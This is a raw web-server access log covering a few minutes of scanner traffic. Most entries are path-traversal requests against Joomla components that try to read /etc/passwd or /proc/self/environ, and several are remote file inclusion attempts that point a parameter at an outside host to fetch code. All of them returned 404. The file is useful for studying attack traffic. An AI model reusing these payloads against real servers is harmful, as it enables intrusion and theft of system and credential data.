78.46.47.78 - - [08/May/2010:00:35:48 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
78.46.47.78 - - [08/May/2010:00:35:48 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
78.46.47.78 - - [08/May/2010:00:35:49 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
85.19.150.100 - - [08/May/2010:00:36:04 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
85.19.150.100 - - [08/May/2010:00:36:04 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
85.19.150.100 - - [08/May/2010:00:36:04 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
96.9.146.197 - - [08/May/2010:00:36:17 -0500] "GET /logs/access_log.1272067200/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
96.9.146.197 - - [08/May/2010:00:36:17 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
96.9.146.197 - - [08/May/2010:00:36:22 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.831"
195.56.172.136 - - [08/May/2010:00:36:33 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.56.172.136 - - [08/May/2010:00:36:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.56.172.136 - - [08/May/2010:00:36:34 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
67.218.116.131 - - [08/May/2010:00:36:52 -0500] "GET /logs/access_log.1246752000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
206.214.219.125 - - [08/May/2010:00:37:02 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
206.214.219.125 - - [08/May/2010:00:37:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
206.214.219.125 - - [08/May/2010:00:37:03 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.43.48.82 - - [08/May/2010:00:37:07 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
208.43.48.82 - - [08/May/2010:00:37:07 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
208.43.48.82 - - [08/May/2010:00:37:07 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
67.205.67.235 - - [08/May/2010:00:37:26 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:37:26 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:37:27 -0500] "GET /logs/access_log.1229731200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:37:30 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:37:30 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:37:31 -0500] "GET /logs/access_log.1217808000/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
89.108.70.32 - - [08/May/2010:00:37:38 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
89.108.70.32 - - [08/May/2010:00:37:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
89.108.70.32 - - [08/May/2010:00:37:38 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
67.205.67.235 - - [08/May/2010:00:37:53 -0500] "GET /logs/access_log.1217808000/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.45.186.2 - - [08/May/2010:00:38:25 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
207.45.186.2 - - [08/May/2010:00:38:25 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
207.45.186.2 - - [08/May/2010:00:38:25 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.205.67.235 - - [08/May/2010:00:38:43 -0500] "GET /logs/access_log.1213833600/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
87.250.255.243 - - [08/May/2010:00:38:59 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
120.50.40.133 - - [08/May/2010:00:39:01 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
120.50.40.133 - - [08/May/2010:00:39:01 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
120.50.40.133 - - [08/May/2010:00:39:02 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
120.50.40.133 - - [08/May/2010:00:39:02 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
120.50.40.133 - - [08/May/2010:00:39:02 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
120.50.40.133 - - [08/May/2010:00:39:02 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
174.121.67.233 - - [08/May/2010:00:39:25 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
174.121.67.233 - - [08/May/2010:00:39:25 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
174.121.67.233 - - [08/May/2010:00:39:26 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
120.50.40.133 - - [08/May/2010:00:39:33 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
120.50.40.133 - - [08/May/2010:00:39:34 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
120.50.40.133 - - [08/May/2010:00:39:34 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
208.78.41.116 - - [08/May/2010:00:39:45 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
208.78.41.116 - - [08/May/2010:00:39:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
208.78.41.116 - - [08/May/2010:00:39:45 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
208.78.41.116 - - [08/May/2010:00:39:57 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
208.78.41.116 - - [08/May/2010:00:39:57 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
208.78.41.116 - - [08/May/2010:00:39:57 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
174.121.67.233 - - [08/May/2010:00:40:04 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
174.121.67.233 - - [08/May/2010:00:40:05 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
174.121.67.233 - - [08/May/2010:00:40:05 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.43.48.82 - - [08/May/2010:00:40:10 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
208.43.48.82 - - [08/May/2010:00:40:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.43.48.82 - - [08/May/2010:00:40:10 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
120.50.40.133 - - [08/May/2010:00:40:21 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
120.50.40.133 - - [08/May/2010:00:40:21 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
120.50.40.133 - - [08/May/2010:00:40:22 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
222.236.47.182 - - [08/May/2010:00:41:26 -0500] "GET /foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:26 -0500] "GET /logs/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:27 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:28 -0500] "GET /foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:28 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:28 -0500] "GET /logs/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:42 -0500] "GET /logs/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:42 -0500] "GET /foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:41:42 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.205.67.235 - - [08/May/2010:00:41:49 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:41:50 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:41:50 -0500] "GET /logs/access_log.1237852800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
222.236.47.182 - - [08/May/2010:00:42:06 -0500] "GET /foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:42:06 -0500] "GET /logs/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:00:42:06 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.129.119.44 - - [08/May/2010:00:42:29 -0500] "GET /logs/access_log.1233273600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.16.214.18 - - [08/May/2010:00:42:36 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.16.214.18 - - [08/May/2010:00:42:42 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.16.214.18 - - [08/May/2010:00:42:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.16.214.18 - - [08/May/2010:00:42:43 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.16.214.18 - - [08/May/2010:00:42:46 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.16.214.18 - - [08/May/2010:00:42:46 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.16.214.18 - - [08/May/2010:00:42:47 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
112.78.7.41 - - [08/May/2010:00:43:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
67.205.67.235 - - [08/May/2010:00:43:51 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:43:51 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:43:51 -0500] "GET /logs/access_log.1227484800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
64.251.10.117 - - [08/May/2010:00:43:53 -0500] "GET ///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
67.205.67.235 - - [08/May/2010:00:43:55 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:43:55 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:43:55 -0500] "GET /logs/access_log.1237852800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:44:04 -0500] "GET /logs/access_log.1237852800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
216.129.119.12 - - [08/May/2010:00:44:13 -0500] "GET /logs/access_log.1254614400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.205.67.235 - - [08/May/2010:00:44:14 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:44:14 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:44:14 -0500] "GET /logs/access_log.1222473600/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
